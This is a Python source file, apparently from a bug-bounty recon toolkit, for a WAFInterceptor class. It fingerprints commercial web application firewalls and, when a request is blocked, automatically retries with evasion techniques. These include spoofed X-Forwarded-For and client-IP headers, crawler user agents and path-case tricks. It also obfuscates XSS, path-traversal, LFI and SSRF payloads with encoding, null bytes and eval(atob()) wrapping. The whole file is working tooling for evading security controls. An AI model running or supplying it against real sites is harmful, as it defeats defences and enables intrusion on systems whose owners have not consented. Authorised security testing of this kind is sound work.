"""
WAF Interceptor — Auto-detect and bypass WAF blocks for all harnesses.

Wraps HTTP requests (sync via requests, async via httpx). On WAF block,
automatically retries with WAF-specific bypass techniques before failing.

Two request tiers:

  Tier 1 — Normal requests (WAF bypass only):
    interceptor.get(path)          # header/delay/protocol bypasses only
    interceptor.aget(path)

  Tier 2 — Payload requests (WAF bypass + payload obfuscation):
    interceptor.get_payload(path)  # Tier 1 + case_swap, hex_encode, etc.
    interceptor.aget_payload(path) # Obfuscates query param values in URL

Usage (sync):
    interceptor = WAFInterceptor(target="https://target.com", program="acme")
    resp = interceptor.get("/admin")
    resp = interceptor.get_payload("/search?q=<script>alert(1)</script>")

Usage (async):
    interceptor = WAFInterceptor(target="https://target.com", program="acme")
    resp = await interceptor.aget("/admin", client=httpx_client)
    resp = await interceptor.aget_payload("/dl?file=../etc/passwd")

In bypass_harness.py:
    waf = WAFInterceptor(target=target, program=program)
    # Normal requests (403 bypass, CORS, IDOR):
    resp = await waf.wrap_async(client, method, url, **kwargs)
    # Payload requests (LFI, RFI, SSRF, redirect):
    resp = await waf.aget_payload(url, client=client)

Output:
    ~/Shared/bounty_recon/{program}/agent_shared/findings/waf/
    ├── blocks_log.txt       WAF blocks encountered
    ├── bypasses_log.txt     Successful bypasses
    └── summary.json         Stats: total requests, blocks, bypasses
"""

from __future__ import annotations

import asyncio
import base64
import json
import random
import re
import string
import time
from datetime import datetime, timezone
from pathlib import Path
from typing import Any, Optional, Union
from urllib.parse import urljoin, urlparse, parse_qs, urlencode, urlunparse

import httpx

try:
    import requests as _requests
    _REQUESTS_AVAILABLE = True
except ImportError:
    _REQUESTS_AVAILABLE = False

# ---------------------------------------------------------------------------
# WAF Signatures
# ---------------------------------------------------------------------------

WAF_SIGNATURES: dict[str, list[str]] = {
    "Akamai": [
        "AkamaiGHost", "AkamaiHTTPServer", "Reference #",
        "The requested URL was rejected", "AS-DOS-CID",
        "Access Denied", "akamai",
    ],
    "Cloudflare": [
        "Attention required!", "Cloudflare", "Ray ID:",
        "__cf_chl_jschl_tk__", "Checking your browser",
        "Cloudflare Ray ID:", "cf-error-details", "cf-ray",
        "Just a moment", "Enable JavaScript and cookies",
    ],
    "AWS WAF": [
        "403 Forbidden", "403 ERROR", "The request could not be satisfied",
        "Generated by cloudfront", "CloudFront",
        "X-Cache: Error from cloudfront",
    ],
    "Imperva": [
        "Incapsula", "_Incapsula_Resource", "reference ID",
        "Incapsula incident ID", "incap_ses",
    ],
    "F5 BIG-IP": [
        "The requested URL was rejected", "TS=4b63",
        "support ID", "F5 Networks", "BIGipServer",
    ],
    "Sucuri": [
        "Sucuri WebSite Firewall", "Access denied",
        "Sucuri CloudProxy", "sucuri-waf",
    ],
    "Wordfence": [
        "Wordfence", "has been blocked", "generated by Wordfence",
        "wordfence.com",
    ],
    "ModSecurity": [
        "ModSecurity", "This error was generated by ModSecurity",
        "mod_security", "NOYB",
    ],
    "FortiWeb": [
        "FORTIGATE", "FortiWeb", "Attack ID:",
        "Web Application Firewall", "Fortinet",
    ],
    "Citrix": [
        "Citrix", "Netscaler", "NS-CACHE", "NSC_",
    ],
    "DDoS-Guard": [
        "DDoS protection by", "DDoS", "Traffic rate limit exceeded",
        "Bandwidth limit exceeded", "ddos-guard",
    ],
    "PerimeterX": [
        "PerimeterX", "px-captcha", "_pxde", "pxi.pub",
        "Access to this page has been denied",
    ],
    "DataDome": [
        "datadome", "DataDome", "dd_referrer",
    ],
    "Barracuda": [
        "Barracuda", "barra_counter_session",
    ],
}

# Status codes that indicate a WAF block (combined with body/header checks)
_BLOCK_STATUS_CODES = {403, 406, 429, 503, 520, 521, 522, 523, 524}

# Header names that WAFs often set
_WAF_HEADERS = {
    "x-sucuri-id", "x-sucuri-cache", "x-protected-by",
    "x-cdn", "x-cdn-geo", "x-firewall-protection",
    "server-timing", "cf-ray", "x-fw-hash",
    "x-iinfo", "x-check-cacheable",
}

# ---------------------------------------------------------------------------
# Bypass Techniques
# ---------------------------------------------------------------------------

_CHROME_UA  = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
_IPHONE_UA  = "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1"
_GOOGLEBOT  = "Googlebot/2.1 (+http://www.google.com/bot.html)"
_BINGBOT    = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

WAF_BYPASSES: dict[str, list[dict[str, Any]]] = {
    "Akamai": [
        {"delay": 2},
        {"headers": {"User-Agent": _CHROME_UA}},
        {"headers": {"Accept-Encoding": "identity"}},
        {"headers": {"Pragma": "akamai-x-cache-on"}},
        {"path_case": "lower"},
        {"path_case": "upper"},
        {"headers": {"X-Forwarded-For": "127.0.0.1", "True-Client-IP": "127.0.0.1"}},
    ],
    "Cloudflare": [
        {"delay": 3},
        {"headers": {"User-Agent": _IPHONE_UA}},
        {"headers": {"CF-IPCountry": "US", "CF-Connecting-IP": "1.1.1.1"}},
        {"headers": {"User-Agent": _CHROME_UA, "Accept-Language": "en-US,en;q=0.9"}},
        {"cookies_passthrough": True},
        {"delay": 5},
    ],
    "AWS WAF": [
        {"headers": {"X-Forwarded-For": "127.0.0.1"}},
        {"headers": {"Host": "localhost"}},
        {"path_prefix": "//"},
        {"headers": {"User-Agent": _GOOGLEBOT}},
        {"headers": {"Via": "1.1 google"}},
    ],
    "Imperva": [
        {"delay": 2},
        {"headers": {"User-Agent": _CHROME_UA}},
        {"headers": {"X-Forwarded-For": "8.8.8.8"}},
        {"cookies_passthrough": True},
        {"path_case": "random"},
    ],
    "F5 BIG-IP": [
        {"headers": {"User-Agent": _CHROME_UA}},
        {"headers": {"X-Forwarded-For": "127.0.0.1"}},
        {"delay": 2},
        {"path_case": "lower"},
    ],
    "Sucuri": [
        {"headers": {"User-Agent": _GOOGLEBOT}},
        {"headers": {"X-Forwarded-For": "127.0.0.1"}},
        {"delay": 3},
    ],
    "Wordfence": [
        {"headers": {"User-Agent": _CHROME_UA}},
        {"delay": 2},
        {"headers": {"X-Forwarded-For": "127.0.0.1"}},
    ],
    "ModSecurity": [
        {"path_case": "random"},
        {"headers": {"User-Agent": _CHROME_UA}},
        {"headers": {"X-Forwarded-For": "127.0.0.1"}},
        {"delay": 1},
    ],
    "PerimeterX": [
        {"delay": 5},
        {"headers": {"User-Agent": _IPHONE_UA}},
        {"cookies_passthrough": True},
    ],
    "generic": [
        {"delay": 1},
        {"headers": {"User-Agent": _GOOGLEBOT}},
        {"headers": {"User-Agent": _BINGBOT}},
        {"headers": {"User-Agent": _CHROME_UA}},
        {"headers": {"User-Agent": _IPHONE_UA}},
        {"headers": {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"}},
        {"headers": {"Accept-Language": "en-US,en;q=0.5"}},
        {"headers": {"X-Forwarded-For": "127.0.0.1"}},
        {"headers": {"X-Originating-IP": "127.0.0.1"}},
        {"path_case": "lower"},
        {"path_case": "upper"},
        {"path_case": "random"},
        {"delay": 3},
    ],
}

# ---------------------------------------------------------------------------
# Payload Bypass Techniques (Tier 2 — payload injection obfuscation)
# ---------------------------------------------------------------------------
# These are applied ONLY in get_payload() / aget_payload() to obfuscate
# query parameter values when the WAF is still blocking after Tier 1.

# Keys that identify a payload-specific bypass entry (used to filter Tier 1).
_PAYLOAD_TECHNIQUE_KEYS: frozenset[str] = frozenset({
    "case_swap", "hex_encode", "unicode_obfuscation",
    "base64_wrap", "null_byte", "comment_insert", "double_url_encode",
})

PAYLOAD_BYPASSES: dict[str, list[dict[str, Any]]] = {
    "Akamai": [
        {"case_swap": True},
        {"hex_encode": True},
        {"unicode_obfuscation": True},
        {"null_byte": True},
        {"comment_insert": True},
        {"double_url_encode": True},
        {"base64_wrap": True},
    ],
    "Cloudflare": [
        {"case_swap": True},
        {"hex_encode": True},
        {"double_url_encode": True},
        {"null_byte": True},
        {"comment_insert": True},
        {"unicode_obfuscation": True},
        {"base64_wrap": True},
    ],
    "generic": [
        {"case_swap": True},
        {"hex_encode": True},
        {"unicode_obfuscation": True},
        {"base64_wrap": True},
        {"null_byte": True},
        {"comment_insert": True},
        {"double_url_encode": True},
    ],
}

# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------

def _random_case(s: str) -> str:
    return "".join(c.upper() if random.random() > 0.5 else c.lower() for c in s)


def _apply_path_case(path: str, mode: str) -> str:
    if mode == "lower":
        return path.lower()
    if mode == "upper":
        return path.upper()
    if mode == "random":
        return _random_case(path)
    return path


def _merge_headers(base: dict, extra: dict) -> dict:
    merged = dict(base)
    merged.update(extra)
    return merged


def _get_text(response: Any) -> str:
    """Extract text from httpx.Response or requests.Response."""
    try:
        return response.text or ""
    except Exception:
        return ""


def _get_headers_dict(response: Any) -> dict[str, str]:
    """Normalize response headers to a lowercase-keyed dict."""
    try:
        return {k.lower(): v for k, v in response.headers.items()}
    except Exception:
        return {}

# ---------------------------------------------------------------------------
# WAFInterceptor
# ---------------------------------------------------------------------------

class WAFInterceptor:
    """
    HTTP interceptor that auto-detects and bypasses WAF blocks.

    Wraps any HTTP request — sync (requests) or async (httpx). When a WAF
    block is detected in the response, automatically retries the request with
    WAF-specific bypass techniques before returning.

    Tracks stats and writes logs to ~/Shared/bounty_recon/{program}/agent_shared/findings/waf/
    """

    DEFAULT_HEADERS = {
        "User-Agent": _CHROME_UA,
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
    }

    def __init__(
        self,
        target: str,
        program: Optional[str] = None,
        verbose: bool = True,
        timeout: int = 15,
    ):
        self.target       = target.rstrip("/")
        self.program      = program
        self.verbose      = verbose
        self.timeout      = timeout
        self.payload_mode = False  # enable via get_payload() / aget_payload()

        # Stats
        self._stats: dict[str, int] = {
            "total_requests": 0,
            "waf_blocks":     0,
            "bypass_success": 0,
            "bypass_fail":    0,
        }

        # Output directory
        self._out_dir: Optional[Path] = None
        if program:
            self._out_dir = (
                Path.home()
                / "Shared"
                / "bounty_recon"
                / program
                / "agent_shared"
                / "findings"
                / "waf"
            )
            self._out_dir.mkdir(parents=True, exist_ok=True)

        # Sync session (lazy init)
        self._session: Any = None

    # ── Logging ──────────────────────────────────────────────────────────────

    def _log(self, msg: str) -> None:
        if self.verbose:
            print(f"[waf] {msg}", flush=True)

    def _write_log(self, filename: str, line: str) -> None:
        if self._out_dir:
            with open(self._out_dir / filename, "a") as f:
                ts = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
                f.write(f"[{ts}] {line}\n")

    def _flush_summary(self) -> None:
        if self._out_dir:
            summary_path = self._out_dir / "summary.json"
            with open(summary_path, "w") as f:
                json.dump(
                    {**self._stats, "updated_at": datetime.now(timezone.utc).isoformat()},
                    f,
                    indent=2,
                )

    # ── WAF Detection ────────────────────────────────────────────────────────

    def detect_waf(self, response: Any) -> Optional[dict]:
        """
        Detect WAF from response.

        Returns dict with keys 'name' and 'confidence' if blocked,
        or None if the response looks clean.
        """
        if response is None:
            return None

        status = getattr(response, "status_code", 200)
        body   = _get_text(response)
        headers = _get_headers_dict(response)

        # Check WAF-specific response headers
        for h in _WAF_HEADERS:
            if h in headers:
                # Identify which WAF from the header value
                hval = headers[h].lower()
                if "cloudflare" in hval or "cf-ray" == h:
                    if status in _BLOCK_STATUS_CODES or "checking your browser" in body.lower():
                        return {"name": "Cloudflare", "confidence": "high", "evidence": f"header:{h}"}
                if "sucuri" in hval:
                    return {"name": "Sucuri", "confidence": "high", "evidence": f"header:{h}"}

        # Check body + header signatures
        for waf_name, signatures in WAF_SIGNATURES.items():
            for sig in signatures:
                sig_lower = sig.lower()
                if sig_lower in body.lower():
                    # Validate with status code for generic strings
                    if sig in ("Access Denied", "Access denied", "blocked") and status not in _BLOCK_STATUS_CODES:
                        continue
                    return {"name": waf_name, "confidence": "high", "evidence": f"body:{sig!r}"}
                # Check response headers values
                for hval in headers.values():
                    if sig_lower in hval.lower():
                        return {"name": waf_name, "confidence": "medium", "evidence": f"header-value:{sig!r}"}

        # Heuristic: status code alone (403/429/503 with short body)
        if status in {403, 429, 503} and len(body) < 2000:
            if status == 429:
                return {"name": "Rate-Limit/WAF", "confidence": "low", "evidence": f"status:{status}"}
            if status == 503 and not body.strip():
                return {"name": "generic", "confidence": "low", "evidence": f"status:{status}"}

        return None

    # ── Bypass Application ───────────────────────────────────────────────────

    def _build_bypass_kwargs(
        self,
        original_kwargs: dict,
        bypass: dict,
        path: str,
    ) -> tuple[dict, str]:
        """Apply a bypass config to kwargs and path. Returns (new_kwargs, new_path)."""
        kwargs = dict(original_kwargs)
        new_path = path

        if "headers" in bypass:
            existing = dict(kwargs.get("headers", {}))
            existing.update(bypass["headers"])
            kwargs["headers"] = existing

        if "path_case" in bypass:
            new_path = _apply_path_case(path, bypass["path_case"])

        if "path_prefix" in bypass:
            new_path = bypass["path_prefix"] + path.lstrip("/")

        # cookies_passthrough: keep whatever cookies came back (handled at call site)
        return kwargs, new_path

    # ── Payload Obfuscation ──────────────────────────────────────────────────

    def obfuscate_payload(self, value: str) -> list[tuple[str, str]]:
        """
        Generate obfuscated variants of a payload string.

        Returns list of (technique_name, obfuscated_value).
        Used in Tier 2 (payload requests) to evade WAF pattern matching.
        """
        results: list[tuple[str, str]] = []

        # case_swap: AlTeRnAtInG case
        results.append(("case_swap", _random_case(value)))

        # hex_encode: full URL-encode every character
        results.append(("hex_encode", "".join(f"%{ord(c):02x}" for c in value)))

        # double_url_encode: encode the % in already-encoded sequences
        double = "".join(
            f"%25{ord(c):02x}" if not c.isalnum() and c not in "-._~" else c
            for c in value
        )
        results.append(("double_url_encode", double))

        # null_byte: append %00 (terminates string in some parsers)
        results.append(("null_byte", value + "%00"))

        # comment_insert: split at midpoint with /**/ (breaks keyword matching)
        if len(value) > 4:
            mid = len(value) // 2
            results.append(("comment_insert", value[:mid] + "/**/" + value[mid:]))

        # unicode_obfuscation: unicode-escape alphabetic characters
        uni = "".join(
            f"\\u{ord(c):04x}" if c.isalpha() else c
            for c in value
        )
        results.append(("unicode_obfuscation", uni))

        # base64_wrap: eval(atob(...)) — useful for JS injection contexts
        b64 = base64.b64encode(value.encode()).decode()
        results.append(("base64_wrap", f"eval(atob('{b64}'))"))

        return results

    def _obfuscate_url_params(self, url: str) -> list[tuple[str, str]]:
        """
        Parse query params from a URL and return obfuscated URL variants.

        Returns list of (technique_name, new_url) where each new URL has one
        query param value replaced with an obfuscated variant.
        """
        parsed = urlparse(url)
        if not parsed.query:
            return []

        params = parse_qs(parsed.query, keep_blank_values=True)
        results: list[tuple[str, str]] = []

        for param_name, values in params.items():
            original = values[0] if values else ""
            for technique, obfuscated in self.obfuscate_payload(original):
                new_params = {k: v[0] for k, v in params.items()}
                new_params[param_name] = obfuscated
                new_query = urlencode(new_params)
                new_url = urlunparse(parsed._replace(query=new_query))
                results.append((technique, new_url))

        return results

    # ── Sync Interface ───────────────────────────────────────────────────────

    def _get_session(self):
        if not _REQUESTS_AVAILABLE:
            raise RuntimeError("requests library not installed; use async interface instead")
        if self._session is None:
            import requests
            self._session = requests.Session()
            self._session.headers.update(self.DEFAULT_HEADERS)
            self._session.verify = False
        return self._session

    def _sync_request(
        self,
        method: str,
        url: str,
        **kwargs,
    ) -> Any:
        import requests
        session = self._get_session()
        kwargs.setdefault("timeout", self.timeout)
        return session.request(method, url, **kwargs)

    def get(self, path: str, **kwargs) -> Any:
        """Sync GET — Tier 1 (WAF bypass only, no payload obfuscation)."""
        return self._sync_call("GET", path, **kwargs)

    def post(self, path: str, **kwargs) -> Any:
        """Sync POST — Tier 1 (WAF bypass only, no payload obfuscation)."""
        return self._sync_call("POST", path, **kwargs)

    def get_payload(self, path: str, **kwargs) -> Any:
        """Sync GET — Tier 1 + Tier 2 (WAF bypass + payload obfuscation)."""
        return self._sync_call_payload("GET", path, **kwargs)

    def post_payload(self, path: str, **kwargs) -> Any:
        """Sync POST — Tier 1 + Tier 2 (WAF bypass + payload obfuscation)."""
        return self._sync_call_payload("POST", path, **kwargs)

    def _sync_call(self, method: str, path: str, **kwargs) -> Any:
        url = self.target + path if path.startswith("/") else urljoin(self.target + "/", path)
        self._stats["total_requests"] += 1

        # Initial request
        resp = self._sync_request(method, url, **kwargs)

        waf = self.detect_waf(resp)
        if waf is None:
            return resp

        # WAF detected
        self._stats["waf_blocks"] += 1
        self._log(f"[!] WAF detected: {waf['name']} ({waf['confidence']}) at {path}")
        self._write_log(
            "blocks_log.txt",
            f"WAF={waf['name']} confidence={waf['confidence']} method={method} path={path} status={resp.status_code} evidence={waf['evidence']}",
        )

        return self._sync_bypass(method, path, url, resp, waf, **kwargs)

    def _sync_bypass(
        self,
        method: str,
        path: str,
        url: str,
        original_resp: Any,
        waf: dict,
        **kwargs,
    ) -> Any:
        waf_name = waf["name"]
        bypass_list = WAF_BYPASSES.get(waf_name, []) + WAF_BYPASSES["generic"]

        for bypass in bypass_list:
            if "delay" in bypass:
                self._log(f"  → sleeping {bypass['delay']}s (WAF rate limit)")
                time.sleep(bypass["delay"])
                continue

            new_kwargs, new_path = self._build_bypass_kwargs(kwargs, bypass, path)
            new_url = self.target + new_path if new_path.startswith("/") else urljoin(self.target + "/", new_path)

            try:
                resp = self._sync_request(method, new_url, **new_kwargs)
            except Exception as e:
                self._log(f"  → bypass error: {e}")
                continue

            if self.detect_waf(resp) is None:
                self._stats["bypass_success"] += 1
                self._log(f"  [+] Bypass worked: {bypass}")
                self._write_log(
                    "bypasses_log.txt",
                    f"WAF={waf_name} bypass={bypass} method={method} path={new_path} status={resp.status_code}",
                )
                self._flush_summary()
                return resp

        # All bypasses failed
        self._stats["bypass_fail"] += 1
        self._log(f"  [-] All bypasses failed for {waf_name}")
        self._flush_summary()
        return original_resp

    def _sync_call_payload(self, method: str, path: str, **kwargs) -> Any:
        """
        Tier 1 + Tier 2 sync request flow for payload injection.

        1. Try as-is.
        2. On WAF block → Tier 1: header/delay bypasses (skip payload-specific keys).
        3. Still blocked → Tier 2: obfuscate query param values in URL.
        """
        url = self.target + path if path.startswith("/") else urljoin(self.target + "/", path)
        self._stats["total_requests"] += 1

        resp = self._sync_request(method, url, **kwargs)
        waf = self.detect_waf(resp)
        if waf is None:
            return resp

        self._stats["waf_blocks"] += 1
        self._log(f"[!] WAF detected: {waf['name']} ({waf['confidence']}) at {path} [payload mode]")
        self._write_log(
            "blocks_log.txt",
            f"WAF={waf['name']} confidence={waf['confidence']} method={method} path={path} status={resp.status_code} evidence={waf['evidence']} tier=payload",
        )

        waf_name = waf["name"]

        # Tier 1: WAF bypasses — skip payload-specific entries
        tier1_list = WAF_BYPASSES.get(waf_name, []) + WAF_BYPASSES["generic"]
        for bypass in tier1_list:
            if any(k in _PAYLOAD_TECHNIQUE_KEYS for k in bypass):
                continue
            if "delay" in bypass:
                self._log(f"  → sleeping {bypass['delay']}s (Tier 1)")
                time.sleep(bypass["delay"])
                continue
            new_kwargs, new_path = self._build_bypass_kwargs(kwargs, bypass, path)
            new_url = self.target + new_path if new_path.startswith("/") else urljoin(self.target + "/", new_path)
            try:
                resp = self._sync_request(method, new_url, **new_kwargs)
            except Exception as e:
                self._log(f"  → bypass error: {e}")
                continue
            if self.detect_waf(resp) is None:
                self._stats["bypass_success"] += 1
                self._log(f"  [+] Tier 1 bypass worked: {bypass}")
                self._write_log("bypasses_log.txt", f"WAF={waf_name} tier=1 bypass={bypass} method={method} path={new_path} status={resp.status_code}")
                self._flush_summary()
                return resp

        # Tier 2: payload obfuscation — mutate query param values
        self._log(f"  → Tier 1 exhausted, trying Tier 2 payload obfuscation")
        for technique, obfuscated_url in self._obfuscate_url_params(url):
            try:
                resp = self._sync_request(method, obfuscated_url, **kwargs)
            except Exception as e:
                self._log(f"  → payload obfuscation error ({technique}): {e}")
                continue
            if self.detect_waf(resp) is None:
                self._stats["bypass_success"] += 1
                self._log(f"  [+] Tier 2 payload bypass worked: {technique}")
                self._write_log("bypasses_log.txt", f"WAF={waf_name} tier=2 technique={technique} method={method} url={obfuscated_url} status={resp.status_code}")
                self._flush_summary()
                return resp

        self._stats["bypass_fail"] += 1
        self._log(f"  [-] All Tier 1+2 bypasses failed for {waf_name}")
        self._flush_summary()
        return resp

    # ── Async Interface ──────────────────────────────────────────────────────

    async def aget(
        self,
        path: str,
        client: Optional[httpx.AsyncClient] = None,
        **kwargs,
    ) -> httpx.Response:
        """Async GET — Tier 1 (WAF bypass only, no payload obfuscation)."""
        return await self._async_call("GET", path, client=client, **kwargs)

    async def apost(
        self,
        path: str,
        client: Optional[httpx.AsyncClient] = None,
        **kwargs,
    ) -> httpx.Response:
        """Async POST — Tier 1 (WAF bypass only, no payload obfuscation)."""
        return await self._async_call("POST", path, client=client, **kwargs)

    async def aget_payload(
        self,
        path: str,
        client: Optional[httpx.AsyncClient] = None,
        **kwargs,
    ) -> httpx.Response:
        """Async GET — Tier 1 + Tier 2 (WAF bypass + payload obfuscation)."""
        return await self._async_call_payload("GET", path, client=client, **kwargs)

    async def apost_payload(
        self,
        path: str,
        client: Optional[httpx.AsyncClient] = None,
        **kwargs,
    ) -> httpx.Response:
        """Async POST — Tier 1 + Tier 2 (WAF bypass + payload obfuscation)."""
        return await self._async_call_payload("POST", path, client=client, **kwargs)

    async def wrap_async(
        self,
        client: httpx.AsyncClient,
        method: str,
        url: str,
        response: httpx.Response,
        **kwargs,
    ) -> httpx.Response:
        """
        Wrap an already-made async response with WAF detection.

        Call this from existing harnesses after they get a response:

            resp = await client.get(url)
            resp = await waf.wrap_async(client, "GET", url, resp)

        If not blocked, returns the original response immediately (zero cost).
        If blocked, tries bypasses and returns the best response.
        """
        waf = self.detect_waf(response)
        if waf is None:
            return response

        self._stats["waf_blocks"] += 1
        path = "/" + url.split("/", 3)[-1] if "/" in url else "/"
        self._log(f"[!] WAF detected: {waf['name']} ({waf['confidence']}) at {url}")
        self._write_log(
            "blocks_log.txt",
            f"WAF={waf['name']} confidence={waf['confidence']} method={method} url={url} status={response.status_code} evidence={waf['evidence']}",
        )
        return await self._async_bypass(client, method, url, response, waf, **kwargs)

    async def _async_call(
        self,
        method: str,
        path: str,
        client: Optional[httpx.AsyncClient] = None,
        **kwargs,
    ) -> httpx.Response:
        url = self.target + path if path.startswith("/") else urljoin(self.target + "/", path)
        self._stats["total_requests"] += 1

        own_client = client is None
        if own_client:
            client = httpx.AsyncClient(
                timeout=self.timeout,
                verify=False,
                headers=self.DEFAULT_HEADERS,
            )

        try:
            resp = await client.request(method, url, **kwargs)

            waf = self.detect_waf(resp)
            if waf is None:
                return resp

            self._stats["waf_blocks"] += 1
            self._log(f"[!] WAF detected: {waf['name']} ({waf['confidence']}) at {path}")
            self._write_log(
                "blocks_log.txt",
                f"WAF={waf['name']} confidence={waf['confidence']} method={method} path={path} status={resp.status_code} evidence={waf['evidence']}",
            )
            return await self._async_bypass(client, method, url, resp, waf, path=path, **kwargs)

        finally:
            if own_client:
                await client.aclose()

    async def _async_bypass(
        self,
        client: httpx.AsyncClient,
        method: str,
        url: str,
        original_resp: httpx.Response,
        waf: dict,
        path: Optional[str] = None,
        **kwargs,
    ) -> httpx.Response:
        waf_name = waf["name"]
        path = path or "/"
        bypass_list = WAF_BYPASSES.get(waf_name, []) + WAF_BYPASSES["generic"]

        for bypass in bypass_list:
            if "delay" in bypass:
                self._log(f"  → sleeping {bypass['delay']}s")
                await asyncio.sleep(bypass["delay"])
                continue

            new_kwargs, new_path = self._build_bypass_kwargs(kwargs, bypass, path)
            new_url = self.target + new_path if new_path.startswith("/") else url

            try:
                resp = await client.request(method, new_url, **new_kwargs)
            except Exception as e:
                self._log(f"  → bypass error: {e}")
                continue

            if self.detect_waf(resp) is None:
                self._stats["bypass_success"] += 1
                self._log(f"  [+] Bypass worked: {bypass}")
                self._write_log(
                    "bypasses_log.txt",
                    f"WAF={waf_name} bypass={bypass} method={method} path={new_path} status={resp.status_code}",
                )
                self._flush_summary()
                return resp

        # All bypasses failed
        self._stats["bypass_fail"] += 1
        self._log(f"  [-] All bypasses failed for {waf_name}")
        self._flush_summary()
        return original_resp

    async def _async_call_payload(
        self,
        method: str,
        path: str,
        client: Optional[httpx.AsyncClient] = None,
        **kwargs,
    ) -> httpx.Response:
        """
        Tier 1 + Tier 2 async request flow for payload injection.

        1. Try as-is.
        2. On WAF block → Tier 1: header/delay bypasses (skip payload-specific keys).
        3. Still blocked → Tier 2: obfuscate query param values in URL.
        """
        url = self.target + path if path.startswith("/") else urljoin(self.target + "/", path)
        self._stats["total_requests"] += 1

        own_client = client is None
        if own_client:
            client = httpx.AsyncClient(
                timeout=self.timeout,
                verify=False,
                headers=self.DEFAULT_HEADERS,
            )

        try:
            resp = await client.request(method, url, **kwargs)
            waf = self.detect_waf(resp)
            if waf is None:
                return resp

            self._stats["waf_blocks"] += 1
            self._log(f"[!] WAF detected: {waf['name']} ({waf['confidence']}) at {path} [payload mode]")
            self._write_log(
                "blocks_log.txt",
                f"WAF={waf['name']} confidence={waf['confidence']} method={method} path={path} status={resp.status_code} evidence={waf['evidence']} tier=payload",
            )

            waf_name = waf["name"]

            # Tier 1: WAF bypasses — skip payload-specific entries
            tier1_list = WAF_BYPASSES.get(waf_name, []) + WAF_BYPASSES["generic"]
            for bypass in tier1_list:
                if any(k in _PAYLOAD_TECHNIQUE_KEYS for k in bypass):
                    continue
                if "delay" in bypass:
                    self._log(f"  → sleeping {bypass['delay']}s (Tier 1)")
                    await asyncio.sleep(bypass["delay"])
                    continue
                new_kwargs, new_path = self._build_bypass_kwargs(kwargs, bypass, path)
                new_url = self.target + new_path if new_path.startswith("/") else url
                try:
                    resp = await client.request(method, new_url, **new_kwargs)
                except Exception as e:
                    self._log(f"  → bypass error: {e}")
                    continue
                if self.detect_waf(resp) is None:
                    self._stats["bypass_success"] += 1
                    self._log(f"  [+] Tier 1 bypass worked: {bypass}")
                    self._write_log("bypasses_log.txt", f"WAF={waf_name} tier=1 bypass={bypass} method={method} path={new_path} status={resp.status_code}")
                    self._flush_summary()
                    return resp

            # Tier 2: payload obfuscation — mutate query param values
            self._log(f"  → Tier 1 exhausted, trying Tier 2 payload obfuscation")
            for technique, obfuscated_url in self._obfuscate_url_params(url):
                try:
                    resp = await client.request(method, obfuscated_url, **kwargs)
                except Exception as e:
                    self._log(f"  → payload obfuscation error ({technique}): {e}")
                    continue
                if self.detect_waf(resp) is None:
                    self._stats["bypass_success"] += 1
                    self._log(f"  [+] Tier 2 payload bypass worked: {technique}")
                    self._write_log("bypasses_log.txt", f"WAF={waf_name} tier=2 technique={technique} method={method} url={obfuscated_url} status={resp.status_code}")
                    self._flush_summary()
                    return resp

            self._stats["bypass_fail"] += 1
            self._log(f"  [-] All Tier 1+2 bypasses failed for {waf_name}")
            self._flush_summary()
            return resp

        finally:
            if own_client:
                await client.aclose()

    # ── Stats / Summary ──────────────────────────────────────────────────────

    @property
    def stats(self) -> dict[str, int]:
        """Return current stats snapshot."""
        return dict(self._stats)

    def print_summary(self) -> None:
        """Print a human-readable stats summary."""
        s = self._stats
        block_rate = (
            f"{s['waf_blocks'] / s['total_requests'] * 100:.1f}%"
            if s["total_requests"] else "n/a"
        )
        bypass_rate = (
            f"{s['bypass_success'] / s['waf_blocks'] * 100:.1f}%"
            if s["waf_blocks"] else "n/a"
        )
        print(
            f"\n[WAF Interceptor Summary]\n"
            f"  Total requests : {s['total_requests']}\n"
            f"  WAF blocks     : {s['waf_blocks']} ({block_rate})\n"
            f"  Bypasses OK    : {s['bypass_success']} ({bypass_rate})\n"
            f"  Bypasses fail  : {s['bypass_fail']}\n"
            f"  Output         : {self._out_dir or 'N/A'}\n",
            flush=True,
        )

    # ── Standalone detection (class method) ──────────────────────────────────

    @classmethod
    def fingerprint(cls, response: Any) -> Optional[str]:
        """
        Quick WAF fingerprint from a response object.
        Returns WAF name string or None. No logging / stats side effects.
        """
        inst = cls.__new__(cls)
        inst._out_dir = None
        inst.verbose = False
        result = inst.detect_waf(response)
        return result["name"] if result else None
